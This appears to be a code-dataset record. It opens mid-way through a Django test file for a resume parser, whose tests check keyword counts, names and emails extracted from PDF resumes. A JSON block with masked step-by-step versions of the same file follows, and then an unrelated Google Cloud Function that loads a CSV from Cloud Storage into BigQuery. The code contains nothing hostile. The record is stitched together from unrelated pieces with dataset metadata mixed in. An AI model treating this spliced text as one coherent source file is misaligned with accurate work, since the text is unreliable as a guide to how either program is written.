json_file = json.loads(json_string)
return json_file
def convert_to_counter(self, json_file):
counter = json_file["counter"]
return Counter(counter)
def generate_counter(self, resume_name):
json_file = self.load_resume(resume_name)
return self.convert_to_counter(json_file)
def generate_name(self, resume_name):
json_file = self.load_resume(resume_name)
return json_file["name"]
def generate_email(self, resume_name):
json_file = self.load_resume(resume_name)
return json_file["email"]
def test_parse_tariq_ali_profile_counter(self):
expected_counter = Counter({'Ruby': 8, 'Rails': 5, 'WordPress': 3, 'Bootstrap': 2, 'JavaScript': 1, 'jQuery': 1, '.NET': 1, 'C#': 1, 'RSpec': 1, 'Sinatra': 1, 'C++': 1, 'Angular': 1, 'Javascript': 1, 'Ethereum': 1, 'blockchain': 1})
actual_counter = self.generate_counter("TariqAliProfile")
self.assertEqual(expected_counter, actual_counter)
def test_parse_tariq_ali_profile_name(self):
expected_name = "Tariq Ali"
actual_name = self.generate_name("TariqAliProfile")
self.assertEqual(expected_name, actual_name)
def test_parse_tariq_ali_profile_email(self):
expected_email = "[email protected]"
actual_email = self.generate_email("TariqAliProfile")
self.assertEqual(expected_email, actual_email)
def test_parse_second_tariq_ali_profile_counter(self):
expected_counter = Counter({'Ruby': 15, 'Rails': 5, 'WordPress': 3, 'Angular': 3, 'Sinatra': 2, 'jQuery': 2, 'JavaScript': 2, 'C++': 2, 'Twitter': 2, 'Javascript': 2, 'Bootstrap': 2, 'GitHub': 1, '.NET': 1, 'RSpec': 1, 'blockchain': 1, 'Ethereum': 1, 'Capistrano': 1, 'AWS': 1, 'C#': 1, 'React': 1})
actual_counter = self.generate_counter("Tariq_Ali")
self.assertEqual(expected_counter, actual_counter)
def test_parse_second_tariq_ali_profile_name(self):
expected_name = "Tariq\xa0Ali"
actual_name = self.generate_name("Tariq_Ali")
self.assertEqual(expected_name, actual_name)
def test_parse_second_tariq_ali_profile_email(self):
expected_email = "[email protected]"
actual_email = self.generate_email("Tariq_Ali")
self.assertEqual(expected_email, actual_email)
def test_parse_dan_bernier_profile_counter(self):
expected_counter = Counter({'Ruby': 7, 'Processing': 4, 'C#': 3, 'Rails': 2, 'Javascript': 1, '.NET': 1, 'JavaScript': 1, 'Scheme': 1})
actual_counter = self.generate_counter("DanBernierProfile")
self.assertEqual(expected_counter, actual_counter)
def test_parse_dan_bernier_profile_name(self):
expected_name = "Dan Bernier"
actual_name = self.generate_name("DanBernierProfile")
self.assertEqual(expected_name, actual_name)
def test_parse_dan_bernier_profile_email(self):
expected_email = "[email protected]"
actual_email = self.generate_email("DanBernierProfile")
self.assertEqual(expected_email, actual_email)
def test_parse_dylan_hirschkorn_profile_counter(self):
expected_counter = Counter({'Dylan': 3, 'Visual Basic': 3, 'BASIC': 3, 'C#': 2, 'Swift': 1})
# This is a bug, Dylan only mentioned "Visual Basic", not "Basic" on his resume. However, I do not know of a good way of fixing this specific edge case. Also, Dylan is the name of a programming language, which is why Dylan shows up in the counter.
actual_counter = self.generate_counter("DylanHirschkornProfile")
self.assertEqual(expected_counter, actual_counter)
def test_parse_dylan_hirschkorn_profile_name(self):
expected_name = "Dylan Hirschkorn"
actual_name = self.generate_name("DylanHirschkornProfile")
self.assertEqual(expected_name, actual_name)
def test_parse_dylan_hirschkorn_profile_email(self):
expected_email = ""
actual_email = self.generate_email("DylanHirschkornProfile")
self.assertEqual(expected_email, actual_email)
def test_parse_sean_dugan_murphy_profile_counter(self):
expected_counter = Counter({'Swift': 11, 'Twitter': 3, 'Objective-C': 3, 'Facebook': 3, 'GitHub': 2, 'YouTube': 2, 'CSS': 1, 'C#': 1})
actual_counter = self.generate_counter("SeanDuganMurphyProfile")
self.assertEqual(expected_counter, actual_counter)
def test_parse_sean_dugan_murphy_profile_name(self):
# The full name of the candidate is Sean Dugan Murphy. However we assume that a candidate only has a first and last name...and ignore the edge case where a candidate has a middle name.
expected_name = "Sean Dugan"
actual_name = self.generate_name("SeanDuganMurphyProfile")
self.assertEqual(expected_name, actual_name)
def test_parse_sean_dugan_murphy_profile_email(self):
expected_email = ""
actual_email = self.generate_email("SeanDuganMurphyProfile")
self.assertEqual(expected_email, actual_email)
def test_parse_christopher_salat_ceev_counter(self):
# Note that Christopher Salat does not actually know either PHP or Scratch. He links to several websites that end with the .php extension and he serves as a Scratch DJ. This indicates a problem with relying solely on keywords detached from the context.
expected_counter = Counter({'YouTube': 5, 'PHP': 2, 'Scratch': 1})
actual_counter = self.generate_counter("Christopher_Salat_Ceev")
self.assertEqual(expected_counter, actual_counter)
def test_parse_christopher_salat_ceev_name(self):
expected_name = "Christopher Salat"
actual_name = self.generate_name("Christopher_Salat_Ceev")
self.assertEqual(expected_name, actual_name)
def test_parse_christopher_salat_ceev_email(self):
expected_email = "[email protected]"
actual_email = self.generate_email("Christopher_Salat_Ceev")
self.assertEqual(expected_email, actual_email)
|
normal
|
{
"blob_id": "4bbfb35e4b03e2bfd46dd0fe5bfd54fb01ba11df",
"index": 1996,
"step-1": "<mask token>\n\n\nclass TestResumeParser(TestCase):\n <mask token>\n <mask token>\n\n def generate_counter(self, resume_name):\n json_file = self.load_resume(resume_name)\n return self.convert_to_counter(json_file)\n <mask token>\n\n def generate_email(self, resume_name):\n json_file = self.load_resume(resume_name)\n return json_file['email']\n <mask token>\n <mask token>\n\n def test_parse_tariq_ali_profile_email(self):\n expected_email = '[email protected]'\n actual_email = self.generate_email('TariqAliProfile')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_second_tariq_ali_profile_counter(self):\n expected_counter = Counter({'Ruby': 15, 'Rails': 5, 'WordPress': 3,\n 'Angular': 3, 'Sinatra': 2, 'jQuery': 2, 'JavaScript': 2, 'C++':\n 2, 'Twitter': 2, 'Javascript': 2, 'Bootstrap': 2, 'GitHub': 1,\n '.NET': 1, 'RSpec': 1, 'blockchain': 1, 'Ethereum': 1,\n 'Capistrano': 1, 'AWS': 1, 'C#': 1, 'React': 1})\n actual_counter = self.generate_counter('Tariq_Ali')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_second_tariq_ali_profile_name(self):\n expected_name = 'Tariq\\xa0Ali'\n actual_name = self.generate_name('Tariq_Ali')\n self.assertEqual(expected_name, actual_name)\n <mask token>\n\n def test_parse_dan_bernier_profile_counter(self):\n expected_counter = Counter({'Ruby': 7, 'Processing': 4, 'C#': 3,\n 'Rails': 2, 'Javascript': 1, '.NET': 1, 'JavaScript': 1,\n 'Scheme': 1})\n actual_counter = self.generate_counter('DanBernierProfile')\n self.assertEqual(expected_counter, actual_counter)\n <mask token>\n <mask token>\n <mask token>\n\n def test_parse_dylan_hirschkorn_profile_name(self):\n expected_name = 'Dylan Hirschkorn'\n actual_name = self.generate_name('DylanHirschkornProfile')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_dylan_hirschkorn_profile_email(self):\n expected_email = ''\n actual_email = self.generate_email('DylanHirschkornProfile')\n self.assertEqual(expected_email, actual_email)\n <mask token>\n\n def test_parse_sean_dugan_murphy_profile_name(self):\n expected_name = 'Sean Dugan'\n actual_name = self.generate_name('SeanDuganMurphyProfile')\n self.assertEqual(expected_name, actual_name)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TestResumeParser(TestCase):\n\n def load_resume(self, resume_name):\n path_to_directory = 'generator/fixtures/{resume_name}.pdf'.format(\n resume_name=resume_name)\n file_path = os.path.abspath(path_to_directory)\n json_string = resume_parser.convert(file_path)\n json_file = json.loads(json_string)\n return json_file\n\n def convert_to_counter(self, json_file):\n counter = json_file['counter']\n return Counter(counter)\n\n def generate_counter(self, resume_name):\n json_file = self.load_resume(resume_name)\n return self.convert_to_counter(json_file)\n\n def generate_name(self, resume_name):\n json_file = self.load_resume(resume_name)\n return json_file['name']\n\n def generate_email(self, resume_name):\n json_file = self.load_resume(resume_name)\n return json_file['email']\n\n def test_parse_tariq_ali_profile_counter(self):\n expected_counter = Counter({'Ruby': 8, 'Rails': 5, 'WordPress': 3,\n 'Bootstrap': 2, 'JavaScript': 1, 'jQuery': 1, '.NET': 1, 'C#': \n 1, 'RSpec': 1, 'Sinatra': 1, 'C++': 1, 'Angular': 1,\n 'Javascript': 1, 'Ethereum': 1, 'blockchain': 1})\n actual_counter = self.generate_counter('TariqAliProfile')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_tariq_ali_profile_name(self):\n expected_name = 'Tariq Ali'\n actual_name = self.generate_name('TariqAliProfile')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_tariq_ali_profile_email(self):\n expected_email = '[email protected]'\n actual_email = self.generate_email('TariqAliProfile')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_second_tariq_ali_profile_counter(self):\n expected_counter = Counter({'Ruby': 15, 'Rails': 5, 'WordPress': 3,\n 'Angular': 3, 'Sinatra': 2, 'jQuery': 2, 'JavaScript': 2, 'C++':\n 2, 'Twitter': 2, 'Javascript': 2, 'Bootstrap': 2, 'GitHub': 1,\n '.NET': 1, 'RSpec': 1, 'blockchain': 1, 'Ethereum': 1,\n 'Capistrano': 1, 'AWS': 1, 'C#': 1, 'React': 1})\n actual_counter = self.generate_counter('Tariq_Ali')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_second_tariq_ali_profile_name(self):\n expected_name = 'Tariq\\xa0Ali'\n actual_name = self.generate_name('Tariq_Ali')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_second_tariq_ali_profile_email(self):\n expected_email = '[email protected]'\n actual_email = self.generate_email('Tariq_Ali')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_dan_bernier_profile_counter(self):\n expected_counter = Counter({'Ruby': 7, 'Processing': 4, 'C#': 3,\n 'Rails': 2, 'Javascript': 1, '.NET': 1, 'JavaScript': 1,\n 'Scheme': 1})\n actual_counter = self.generate_counter('DanBernierProfile')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_dan_bernier_profile_name(self):\n expected_name = 'Dan Bernier'\n actual_name = self.generate_name('DanBernierProfile')\n self.assertEqual(expected_name, actual_name)\n <mask token>\n\n def test_parse_dylan_hirschkorn_profile_counter(self):\n expected_counter = Counter({'Dylan': 3, 'Visual Basic': 3, 'BASIC':\n 3, 'C#': 2, 'Swift': 1})\n actual_counter = self.generate_counter('DylanHirschkornProfile')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_dylan_hirschkorn_profile_name(self):\n expected_name = 'Dylan Hirschkorn'\n actual_name = self.generate_name('DylanHirschkornProfile')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_dylan_hirschkorn_profile_email(self):\n expected_email = ''\n actual_email = 
self.generate_email('DylanHirschkornProfile')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_sean_dugan_murphy_profile_counter(self):\n expected_counter = Counter({'Swift': 11, 'Twitter': 3,\n 'Objective-C': 3, 'Facebook': 3, 'GitHub': 2, 'YouTube': 2,\n 'CSS': 1, 'C#': 1})\n actual_counter = self.generate_counter('SeanDuganMurphyProfile')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_sean_dugan_murphy_profile_name(self):\n expected_name = 'Sean Dugan'\n actual_name = self.generate_name('SeanDuganMurphyProfile')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_sean_dugan_murphy_profile_email(self):\n expected_email = ''\n actual_email = self.generate_email('SeanDuganMurphyProfile')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_christopher_salat_ceev_counter(self):\n expected_counter = Counter({'YouTube': 5, 'PHP': 2, 'Scratch': 1})\n actual_counter = self.generate_counter('Christopher_Salat_Ceev')\n self.assertEqual(expected_counter, actual_counter)\n <mask token>\n\n def test_parse_christopher_salat_ceev_email(self):\n expected_email = '[email protected]'\n actual_email = self.generate_email('Christopher_Salat_Ceev')\n self.assertEqual(expected_email, actual_email)\n",
"step-3": "<mask token>\n\n\nclass TestResumeParser(TestCase):\n\n def load_resume(self, resume_name):\n path_to_directory = 'generator/fixtures/{resume_name}.pdf'.format(\n resume_name=resume_name)\n file_path = os.path.abspath(path_to_directory)\n json_string = resume_parser.convert(file_path)\n json_file = json.loads(json_string)\n return json_file\n\n def convert_to_counter(self, json_file):\n counter = json_file['counter']\n return Counter(counter)\n\n def generate_counter(self, resume_name):\n json_file = self.load_resume(resume_name)\n return self.convert_to_counter(json_file)\n\n def generate_name(self, resume_name):\n json_file = self.load_resume(resume_name)\n return json_file['name']\n\n def generate_email(self, resume_name):\n json_file = self.load_resume(resume_name)\n return json_file['email']\n\n def test_parse_tariq_ali_profile_counter(self):\n expected_counter = Counter({'Ruby': 8, 'Rails': 5, 'WordPress': 3,\n 'Bootstrap': 2, 'JavaScript': 1, 'jQuery': 1, '.NET': 1, 'C#': \n 1, 'RSpec': 1, 'Sinatra': 1, 'C++': 1, 'Angular': 1,\n 'Javascript': 1, 'Ethereum': 1, 'blockchain': 1})\n actual_counter = self.generate_counter('TariqAliProfile')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_tariq_ali_profile_name(self):\n expected_name = 'Tariq Ali'\n actual_name = self.generate_name('TariqAliProfile')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_tariq_ali_profile_email(self):\n expected_email = '[email protected]'\n actual_email = self.generate_email('TariqAliProfile')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_second_tariq_ali_profile_counter(self):\n expected_counter = Counter({'Ruby': 15, 'Rails': 5, 'WordPress': 3,\n 'Angular': 3, 'Sinatra': 2, 'jQuery': 2, 'JavaScript': 2, 'C++':\n 2, 'Twitter': 2, 'Javascript': 2, 'Bootstrap': 2, 'GitHub': 1,\n '.NET': 1, 'RSpec': 1, 'blockchain': 1, 'Ethereum': 1,\n 'Capistrano': 1, 'AWS': 1, 'C#': 1, 'React': 1})\n actual_counter = self.generate_counter('Tariq_Ali')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_second_tariq_ali_profile_name(self):\n expected_name = 'Tariq\\xa0Ali'\n actual_name = self.generate_name('Tariq_Ali')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_second_tariq_ali_profile_email(self):\n expected_email = '[email protected]'\n actual_email = self.generate_email('Tariq_Ali')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_dan_bernier_profile_counter(self):\n expected_counter = Counter({'Ruby': 7, 'Processing': 4, 'C#': 3,\n 'Rails': 2, 'Javascript': 1, '.NET': 1, 'JavaScript': 1,\n 'Scheme': 1})\n actual_counter = self.generate_counter('DanBernierProfile')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_dan_bernier_profile_name(self):\n expected_name = 'Dan Bernier'\n actual_name = self.generate_name('DanBernierProfile')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_dan_bernier_profile_email(self):\n expected_email = '[email protected]'\n actual_email = self.generate_email('DanBernierProfile')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_dylan_hirschkorn_profile_counter(self):\n expected_counter = Counter({'Dylan': 3, 'Visual Basic': 3, 'BASIC':\n 3, 'C#': 2, 'Swift': 1})\n actual_counter = self.generate_counter('DylanHirschkornProfile')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_dylan_hirschkorn_profile_name(self):\n expected_name = 'Dylan Hirschkorn'\n actual_name = 
self.generate_name('DylanHirschkornProfile')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_dylan_hirschkorn_profile_email(self):\n expected_email = ''\n actual_email = self.generate_email('DylanHirschkornProfile')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_sean_dugan_murphy_profile_counter(self):\n expected_counter = Counter({'Swift': 11, 'Twitter': 3,\n 'Objective-C': 3, 'Facebook': 3, 'GitHub': 2, 'YouTube': 2,\n 'CSS': 1, 'C#': 1})\n actual_counter = self.generate_counter('SeanDuganMurphyProfile')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_sean_dugan_murphy_profile_name(self):\n expected_name = 'Sean Dugan'\n actual_name = self.generate_name('SeanDuganMurphyProfile')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_sean_dugan_murphy_profile_email(self):\n expected_email = ''\n actual_email = self.generate_email('SeanDuganMurphyProfile')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_christopher_salat_ceev_counter(self):\n expected_counter = Counter({'YouTube': 5, 'PHP': 2, 'Scratch': 1})\n actual_counter = self.generate_counter('Christopher_Salat_Ceev')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_christopher_salat_ceev_name(self):\n expected_name = 'Christopher Salat'\n actual_name = self.generate_name('Christopher_Salat_Ceev')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_christopher_salat_ceev_email(self):\n expected_email = '[email protected]'\n actual_email = self.generate_email('Christopher_Salat_Ceev')\n self.assertEqual(expected_email, actual_email)\n",
"step-4": "from __future__ import unicode_literals\nfrom django.test import TestCase\nfrom collections import Counter\nimport generator.resume_parser as resume_parser\nimport os\nimport json\n\n\nclass TestResumeParser(TestCase):\n\n def load_resume(self, resume_name):\n path_to_directory = 'generator/fixtures/{resume_name}.pdf'.format(\n resume_name=resume_name)\n file_path = os.path.abspath(path_to_directory)\n json_string = resume_parser.convert(file_path)\n json_file = json.loads(json_string)\n return json_file\n\n def convert_to_counter(self, json_file):\n counter = json_file['counter']\n return Counter(counter)\n\n def generate_counter(self, resume_name):\n json_file = self.load_resume(resume_name)\n return self.convert_to_counter(json_file)\n\n def generate_name(self, resume_name):\n json_file = self.load_resume(resume_name)\n return json_file['name']\n\n def generate_email(self, resume_name):\n json_file = self.load_resume(resume_name)\n return json_file['email']\n\n def test_parse_tariq_ali_profile_counter(self):\n expected_counter = Counter({'Ruby': 8, 'Rails': 5, 'WordPress': 3,\n 'Bootstrap': 2, 'JavaScript': 1, 'jQuery': 1, '.NET': 1, 'C#': \n 1, 'RSpec': 1, 'Sinatra': 1, 'C++': 1, 'Angular': 1,\n 'Javascript': 1, 'Ethereum': 1, 'blockchain': 1})\n actual_counter = self.generate_counter('TariqAliProfile')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_tariq_ali_profile_name(self):\n expected_name = 'Tariq Ali'\n actual_name = self.generate_name('TariqAliProfile')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_tariq_ali_profile_email(self):\n expected_email = '[email protected]'\n actual_email = self.generate_email('TariqAliProfile')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_second_tariq_ali_profile_counter(self):\n expected_counter = Counter({'Ruby': 15, 'Rails': 5, 'WordPress': 3,\n 'Angular': 3, 'Sinatra': 2, 'jQuery': 2, 'JavaScript': 2, 'C++':\n 2, 'Twitter': 2, 'Javascript': 2, 'Bootstrap': 2, 'GitHub': 1,\n '.NET': 1, 'RSpec': 1, 'blockchain': 1, 'Ethereum': 1,\n 'Capistrano': 1, 'AWS': 1, 'C#': 1, 'React': 1})\n actual_counter = self.generate_counter('Tariq_Ali')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_second_tariq_ali_profile_name(self):\n expected_name = 'Tariq\\xa0Ali'\n actual_name = self.generate_name('Tariq_Ali')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_second_tariq_ali_profile_email(self):\n expected_email = '[email protected]'\n actual_email = self.generate_email('Tariq_Ali')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_dan_bernier_profile_counter(self):\n expected_counter = Counter({'Ruby': 7, 'Processing': 4, 'C#': 3,\n 'Rails': 2, 'Javascript': 1, '.NET': 1, 'JavaScript': 1,\n 'Scheme': 1})\n actual_counter = self.generate_counter('DanBernierProfile')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_dan_bernier_profile_name(self):\n expected_name = 'Dan Bernier'\n actual_name = self.generate_name('DanBernierProfile')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_dan_bernier_profile_email(self):\n expected_email = '[email protected]'\n actual_email = self.generate_email('DanBernierProfile')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_dylan_hirschkorn_profile_counter(self):\n expected_counter = Counter({'Dylan': 3, 'Visual Basic': 3, 'BASIC':\n 3, 'C#': 2, 'Swift': 1})\n actual_counter = self.generate_counter('DylanHirschkornProfile')\n 
self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_dylan_hirschkorn_profile_name(self):\n expected_name = 'Dylan Hirschkorn'\n actual_name = self.generate_name('DylanHirschkornProfile')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_dylan_hirschkorn_profile_email(self):\n expected_email = ''\n actual_email = self.generate_email('DylanHirschkornProfile')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_sean_dugan_murphy_profile_counter(self):\n expected_counter = Counter({'Swift': 11, 'Twitter': 3,\n 'Objective-C': 3, 'Facebook': 3, 'GitHub': 2, 'YouTube': 2,\n 'CSS': 1, 'C#': 1})\n actual_counter = self.generate_counter('SeanDuganMurphyProfile')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_sean_dugan_murphy_profile_name(self):\n expected_name = 'Sean Dugan'\n actual_name = self.generate_name('SeanDuganMurphyProfile')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_sean_dugan_murphy_profile_email(self):\n expected_email = ''\n actual_email = self.generate_email('SeanDuganMurphyProfile')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_christopher_salat_ceev_counter(self):\n expected_counter = Counter({'YouTube': 5, 'PHP': 2, 'Scratch': 1})\n actual_counter = self.generate_counter('Christopher_Salat_Ceev')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_christopher_salat_ceev_name(self):\n expected_name = 'Christopher Salat'\n actual_name = self.generate_name('Christopher_Salat_Ceev')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_christopher_salat_ceev_email(self):\n expected_email = '[email protected]'\n actual_email = self.generate_email('Christopher_Salat_Ceev')\n self.assertEqual(expected_email, actual_email)\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.test import TestCase\n\nfrom collections import Counter\n\nimport generator.resume_parser as resume_parser\nimport os\nimport json\n\nclass TestResumeParser(TestCase):\n def load_resume(self, resume_name):\n path_to_directory = \"generator/fixtures/{resume_name}.pdf\".format(resume_name=resume_name)\n file_path = os.path.abspath(path_to_directory)\n json_string = resume_parser.convert(file_path)\n json_file = json.loads(json_string)\n return json_file\n\n def convert_to_counter(self, json_file):\n counter = json_file[\"counter\"]\n return Counter(counter)\n\n def generate_counter(self, resume_name):\n json_file = self.load_resume(resume_name)\n return self.convert_to_counter(json_file)\n\n def generate_name(self, resume_name):\n json_file = self.load_resume(resume_name)\n return json_file[\"name\"]\n\n def generate_email(self, resume_name):\n json_file = self.load_resume(resume_name)\n return json_file[\"email\"]\n\n def test_parse_tariq_ali_profile_counter(self):\n expected_counter = Counter({'Ruby': 8, 'Rails': 5, 'WordPress': 3, 'Bootstrap': 2, 'JavaScript': 1, 'jQuery': 1, '.NET': 1, 'C#': 1, 'RSpec': 1, 'Sinatra': 1, 'C++': 1, 'Angular': 1, 'Javascript': 1, 'Ethereum': 1, 'blockchain': 1})\n actual_counter = self.generate_counter(\"TariqAliProfile\")\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_tariq_ali_profile_name(self):\n expected_name = \"Tariq Ali\"\n actual_name = self.generate_name(\"TariqAliProfile\")\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_tariq_ali_profile_email(self):\n expected_email = \"[email protected]\"\n actual_email = self.generate_email(\"TariqAliProfile\")\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_second_tariq_ali_profile_counter(self):\n expected_counter = Counter({'Ruby': 15, 'Rails': 5, 'WordPress': 3, 'Angular': 3, 'Sinatra': 2, 'jQuery': 2, 'JavaScript': 2, 'C++': 2, 'Twitter': 2, 'Javascript': 2, 'Bootstrap': 2, 'GitHub': 1, '.NET': 1, 'RSpec': 1, 'blockchain': 1, 'Ethereum': 1, 'Capistrano': 1, 'AWS': 1, 'C#': 1, 'React': 1})\n actual_counter = self.generate_counter(\"Tariq_Ali\")\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_second_tariq_ali_profile_name(self):\n expected_name = \"Tariq\\xa0Ali\"\n actual_name = self.generate_name(\"Tariq_Ali\")\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_second_tariq_ali_profile_email(self):\n expected_email = \"[email protected]\"\n actual_email = self.generate_email(\"Tariq_Ali\")\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_dan_bernier_profile_counter(self):\n expected_counter = Counter({'Ruby': 7, 'Processing': 4, 'C#': 3, 'Rails': 2, 'Javascript': 1, '.NET': 1, 'JavaScript': 1, 'Scheme': 1})\n actual_counter = self.generate_counter(\"DanBernierProfile\")\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_dan_bernier_profile_name(self):\n expected_name = \"Dan Bernier\"\n actual_name = self.generate_name(\"DanBernierProfile\")\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_dan_bernier_profile_email(self):\n expected_email = \"[email protected]\"\n actual_email = self.generate_email(\"DanBernierProfile\")\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_dylan_hirschkorn_profile_counter(self):\n expected_counter = Counter({'Dylan': 3, 'Visual Basic': 3, 'BASIC': 3, 'C#': 2, 'Swift': 1})\n # This is a bug, Dylan only mentioned 
\"Visual Basic\", not \"Basic\" on his resume. However, I do not know of a good way of fixing this specific edge case. Also, Dylan is the name of a programming language, which is why Dylan shows up in the counter.\n actual_counter = self.generate_counter(\"DylanHirschkornProfile\")\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_dylan_hirschkorn_profile_name(self):\n expected_name = \"Dylan Hirschkorn\"\n actual_name = self.generate_name(\"DylanHirschkornProfile\")\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_dylan_hirschkorn_profile_email(self):\n expected_email = \"\"\n actual_email = self.generate_email(\"DylanHirschkornProfile\")\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_sean_dugan_murphy_profile_counter(self):\n expected_counter = Counter({'Swift': 11, 'Twitter': 3, 'Objective-C': 3, 'Facebook': 3, 'GitHub': 2, 'YouTube': 2, 'CSS': 1, 'C#': 1})\n actual_counter = self.generate_counter(\"SeanDuganMurphyProfile\")\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_sean_dugan_murphy_profile_name(self):\n # The full name of the candidate is Sean Dugan Murphy. However we assume that a candidate only has a first and last name...and ignore the edge case where a candidate has a middle name.\n expected_name = \"Sean Dugan\"\n actual_name = self.generate_name(\"SeanDuganMurphyProfile\")\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_sean_dugan_murphy_profile_email(self):\n expected_email = \"\"\n actual_email = self.generate_email(\"SeanDuganMurphyProfile\")\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_christopher_salat_ceev_counter(self):\n # Note that Christopher Salat does not actually know either PHP or Scratch. He links to several websites that end with the .php extension and he serves as a Scratch DJ. This indicates a problem with relying solely on keywords detached from the context.\n expected_counter = Counter({'YouTube': 5, 'PHP': 2, 'Scratch': 1})\n actual_counter = self.generate_counter(\"Christopher_Salat_Ceev\")\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_christopher_salat_ceev_name(self):\n expected_name = \"Christopher Salat\"\n actual_name = self.generate_name(\"Christopher_Salat_Ceev\")\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_christopher_salat_ceev_email(self):\n expected_email = \"[email protected]\"\n actual_email = self.generate_email(\"Christopher_Salat_Ceev\")\n self.assertEqual(expected_email, actual_email)\n",
"step-ids": [
10,
22,
24,
25,
26
]
}
|
[
10,
22,
24,
25,
26
] |
import os
from google.cloud import bigquery
def csv_loader(data, context):
client = bigquery.Client()
dataset_id = os.environ['DATASET']
dataset_ref = client.dataset(dataset_id)
job_config = bigquery.LoadJobConfig()
job_config.schema = [
bigquery.SchemaField('id', 'INTEGER'),
bigquery.SchemaField('first_name', 'STRING'),
bigquery.SchemaField('last_name', 'STRING'),
bigquery.SchemaField('email', 'STRING'),
bigquery.SchemaField('gender', 'STRING'),
bigquery.SchemaField('ip_address', 'STRING')
]
job_config.skip_leading_rows = 1
job_config.source_format = bigquery.SourceFormat.CSV
# get the URI for uploaded CSV in GCS from 'data'
uri = 'gs://' + os.environ['BUCKET'] + '/' + data['name']
# lets do this
load_job = client.load_table_from_uri(
uri,
dataset_ref.table(os.environ['TABLE']),
job_config=job_config)
print('Starting job {}'.format(load_job.job_id))
print('Function=csv_loader, Version=' + os.environ['VERSION'])
print('File: {}'.format(data['name']))
load_job.result() # wait for table load to complete.
print('Job finished.')
destination_table = client.get_table(dataset_ref.table(os.environ['TABLE']))
print('Loaded {} rows.'.format(destination_table.num_rows))
|
normal
|
{
"blob_id": "01467a4dad3255a99025c347469881a71ffbae7c",
"index": 8179,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef csv_loader(data, context):\n client = bigquery.Client()\n dataset_id = os.environ['DATASET']\n dataset_ref = client.dataset(dataset_id)\n job_config = bigquery.LoadJobConfig()\n job_config.schema = [bigquery.SchemaField('id', 'INTEGER'), bigquery.\n SchemaField('first_name', 'STRING'), bigquery.SchemaField(\n 'last_name', 'STRING'), bigquery.SchemaField('email', 'STRING'),\n bigquery.SchemaField('gender', 'STRING'), bigquery.SchemaField(\n 'ip_address', 'STRING')]\n job_config.skip_leading_rows = 1\n job_config.source_format = bigquery.SourceFormat.CSV\n uri = 'gs://' + os.environ['BUCKET'] + '/' + data['name']\n load_job = client.load_table_from_uri(uri, dataset_ref.table(os.environ\n ['TABLE']), job_config=job_config)\n print('Starting job {}'.format(load_job.job_id))\n print('Function=csv_loader, Version=' + os.environ['VERSION'])\n print('File: {}'.format(data['name']))\n load_job.result()\n print('Job finished.')\n destination_table = 